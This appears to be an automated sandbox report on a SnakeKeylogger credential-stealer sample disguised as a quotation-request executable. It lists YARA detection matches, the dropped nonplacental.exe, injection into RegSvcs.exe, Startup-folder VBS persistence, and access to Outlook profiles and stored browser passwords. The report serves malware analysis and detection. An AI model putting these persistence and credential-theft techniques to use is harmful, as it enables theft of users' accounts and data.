Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002A1484	2_2_002A1484
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_00295520	2_2_00295520
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002A7696	2_2_002A7696
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_00295760	2_2_00295760
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002A1978	2_2_002A1978
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002B9AB5	2_2_002B9AB5
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002ABDA6	2_2_002ABDA6
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002A1D90	2_2_002A1D90
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_00307DDB	2_2_00307DDB
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_0028DF00	2_2_0028DF00
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_00293FE0	2_2_00293FE0
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_01296E38	2_2_01296E38

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: String function: 00FF8900 appears 42 times
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: String function: 00FD7DE1 appears 35 times
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: String function: 00FF0AE3 appears 70 times
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: String function: 002A0AE3 appears 70 times
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: String function: 00287DE1 appears 36 times
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: String function: 002A8900 appears 42 times

Source: QUOTATION REQUEST - BQS058.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 5.2.nonplacental.exe.1d10000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.nonplacental.exe.1d10000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.nonplacental.exe.1d10000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.nonplacental.exe.1d10000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.nonplacental.exe.2060000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.nonplacental.exe.2060000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.nonplacental.exe.2060000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.nonplacental.exe.2060000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: nonplacental.exe PID: 2608, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 432, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: nonplacental.exe PID: 6508, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 2.2.nonplacental.exe.2060000.1.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.nonplacental.exe.2060000.1.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.nonplacental.exe.1d10000.1.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.nonplacental.exe.1d10000.1.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_0103A06A GetLastError,FormatMessageW,

0_2_0103A06A

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_010281CB AdjustTokenPrivileges,CloseHandle,	0_2_010281CB
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_010287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_010287E1
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002D81CB AdjustTokenPrivileges,CloseHandle,	2_2_002D81CB
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002D87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_002D87E1

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_0103B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0103B333

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_0104EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0104EE0D

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_0103C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0103C397

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_00FD4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00FD4E89

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

File created: C:\Users\user\AppData\Local\Allene

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

File created: C:\Users\user\AppData\Local\Temp\aut301F.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs"

Source: QUOTATION REQUEST - BQS058.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.3338328536.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3338328536.0000000002C18000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3338328536.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3338328536.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3338328536.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3338637287.0000000003C8D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002D78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002D55000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: QUOTATION REQUEST - BQS058.exe

ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

File read: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe "C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe"
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Process created: C:\Users\user\AppData\Local\Allene\nonplacental.exe "C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe"
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Allene\nonplacental.exe "C:\Users\user\AppData\Local\Allene\nonplacental.exe"
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Allene\nonplacental.exe"
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Process created: C:\Users\user\AppData\Local\Allene\nonplacental.exe "C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Allene\nonplacental.exe "C:\Users\user\AppData\Local\Allene\nonplacental.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Allene\nonplacental.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: QUOTATION REQUEST - BQS058.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: QUOTATION REQUEST - BQS058.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: QUOTATION REQUEST - BQS058.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: QUOTATION REQUEST - BQS058.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: QUOTATION REQUEST - BQS058.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: QUOTATION REQUEST - BQS058.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: QUOTATION REQUEST - BQS058.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: nonplacental.exe, 00000002.00000003.2111868829.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2111211114.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2237143101.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2237482817.0000000003990000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: nonplacental.exe, 00000002.00000003.2111868829.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2111211114.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2237143101.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2237482817.0000000003990000.00000004.00001000.00020000.00000000.sdmp

Source: QUOTATION REQUEST - BQS058.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: QUOTATION REQUEST - BQS058.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: QUOTATION REQUEST - BQS058.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: QUOTATION REQUEST - BQS058.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: QUOTATION REQUEST - BQS058.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_00FD4B37 LoadLibraryA,GetProcAddress,

0_2_00FD4B37

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FF8945 push ecx; ret	0_2_00FF8958
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_0028C4C7 push A30028BAh; retn 0028h	2_2_0028C50D
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002A8945 push ecx; ret	2_2_002A8958

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

File created: C:\Users\user\AppData\Local\Allene\nonplacental.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_00FD48D7
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_01055376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_01055376
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_002848D7
